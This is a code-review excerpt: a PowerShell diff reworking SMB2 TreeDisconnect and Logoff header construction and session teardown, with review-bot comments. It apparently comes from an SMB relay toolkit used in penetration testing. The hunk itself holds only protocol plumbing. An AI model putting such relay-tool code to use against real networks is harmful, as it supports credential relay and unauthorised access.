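Review bot: The CloseRequest stage repeats the same two-line pattern that every other stage in this diff now uses, `$SMB2_message_ID++` followed by a `New-PacketSMB2Header <cmd> 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID` call, and the only thing that varies is the command byte pair. Since the credit request, process ID, tree ID and session ID are constant for the life of the session, a small wrapper taking just the command (for example `New-SMB2SessionHeader 0x06,0x00`) that increments the message ID and fills in the session-scoped fields would keep the dozen call sites from drifting apart, which is exactly the kind of inconsistency this commit is cleaning up (the old `+= 20` versus `++` mix). This is a style point only; the new lines are correct as written. The enclosing switch continues outside the hunk.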
@@ -2675,8 +2686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'TreeDisconnect'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2716,9 +2726,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'Logoff'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2744,6 +2753,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
$SMB_client_stream.Flush()
$SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
}
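Review bot: The new `$SMB_client_stage = 'Exit'` is only reached after the blocking `Read` on the Logoff response, and the byte count that `Read` returns is discarded, so a server that never answers the logoff (or drops the socket mid-read) either stalls the loop or raises an exception before the stage is ever set. Whether a `ReadTimeout` is configured on `$SMB_client_stream` is not visible in this hunk; if it is not, consider moving the assignment before the `Write`, or wrapping the logoff I/O in `try { ... } finally { $SMB_client_stage = 'Exit' }`, so teardown always completes regardless of how the peer behaves. A `Write-Verbose` of the logoff response status would also make a failed session teardown visible instead of silent. The surrounding switch and the loop that drives these stages continue outside the hunk.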
}